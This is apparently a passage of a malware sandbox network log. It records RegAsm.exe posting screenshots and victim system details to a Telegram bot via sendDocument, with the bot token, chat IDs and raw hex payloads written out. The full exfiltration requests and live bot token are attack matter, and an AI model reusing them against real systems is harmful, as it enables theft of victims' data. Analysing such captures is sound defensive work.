                                              2024-05-23 18:26:44 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 31 34 39 31 65 35 34 34 32 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 31 34 39 31 65 35 34 34 32 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 30 2f 32 30 32 34 20 31 38 3a 34 31 3a 33 35 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcc1491e544297Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcc1491e544297Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/20/2024 18:41:35User
                                              2024-05-23 18:26:44 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:44 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:44 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:44 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:44 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:44 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 31 34 39 31 65 35 34 34 32 39 37 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcc1491e544297--
                                              2024-05-23 18:26:44 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:44 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":274,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488804,"document":{"file_name":"user-715575 2024-08-20 18-51-36.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgESZk-KZN9wmpdBIKlpuRaw7xQ41d4AAsgTAALx64FSVVUQpjcITQIBAAdtAAM1BA","file_unique_id":"AQADyBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgESZk-KZN9wmpdBIKlpuRaw7xQ41d4AAsgTAALx64FSVVUQpjcITQIBAAdtAAM1BA","file_unique_id":"AQADyBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBEmZPimTfcJqXQSCpabkWsO8UONXeAALIEwAC8euBUlVVEKY3CE0CNQQ","file_unique_id":"AgADyBMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 08/20/2024 18:41:35\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.749738149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:04 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcc94f27781fa4
                                              Host: api.telegram.org
                                              Content-Length: 66944
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:27:04 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:04 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 34 66 32 37 37 38 31 66 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 34 66 32 37 37 38 31 66 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 33 30 2f 32 30 32 34 20 32 33 3a 34 34 3a 35 31 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcc94f27781fa4Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcc94f27781fa4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/30/2024 23:44:51User
                                              2024-05-23 18:27:04 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:04 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:04 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:27:04 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:27:04 UTC1358OUTData Raw: b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a c8 a2 90 1a 72 eb 97 d3 cf 0c f7 12 79 f3 45 6d 25 b7 99 29 66 66 57 0e 09 24 9e 48 12 1c 7d 05 66 51 45 00 14 51 45 00 15 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 b9 1a 29 24 b9 d4 fa ad 81 eb 17 1e 8c ec a6 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 3f 59 f1 2a ea 3a 42 e9 c9 6c ca aa e1 c4 8c dc 9c 67 b6 3d fd 6b 9d a2 b3 8d 18 46 2a 09 68 9d fa ee 53 9b 72 e6 eb 6b 05 14 51 5a 92 15 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b
                                              Data Ascii: \>k()Vgr\W9jryEm%)ffW$H}fQEQEMc%x*)$36b?Y*:Blg=kF*hSrkQZj"X'm+zQRVdNj7SmyyqY^*<ZC /@=qW#U*;
                                              2024-05-23 18:27:04 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 34 66 32 37 37 38 31 66 61 34 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcc94f27781fa4--
                                              2024-05-23 18:27:05 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:05 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":276,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488825,"document":{"file_name":"user-715575 2024-08-30 23-54-58.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEUZk-KeVwKm9qINZgCdhF2MLG8g_0AAsoTAALx64FSlpqvxmNPSUMBAAdtAAM1BA","file_unique_id":"AQADyhMAAvHrgVJy","file_size":12371,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEUZk-KeVwKm9qINZgCdhF2MLG8g_0AAsoTAALx64FSlpqvxmNPSUMBAAdtAAM1BA","file_unique_id":"AQADyhMAAvHrgVJy","file_size":12371,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBFGZPinlcCpvaiDWYAnYRdjCxvIP9AALKEwAC8euBUpaar8ZjT0lDNQQ","file_unique_id":"AgADyhMAAvHrgVI","file_size":66315},"caption":"New SC Recovered!\n\nTime: 08/30/2024 23:44:51\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.749739149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:24 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcd1385623294a
                                              Host: api.telegram.org
                                              Content-Length: 66944
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:27:25 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:25 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 31 33 38 35 36 32 33 32 39 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 31 33 38 35 36 32 33 32 39 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 30 2f 32 30 32 34 20 30 31 3a 33 31 3a 34 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcd1385623294aContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcd1385623294aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/10/2024 01:31:46User
                                              2024-05-23 18:27:25 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:25 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:25 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
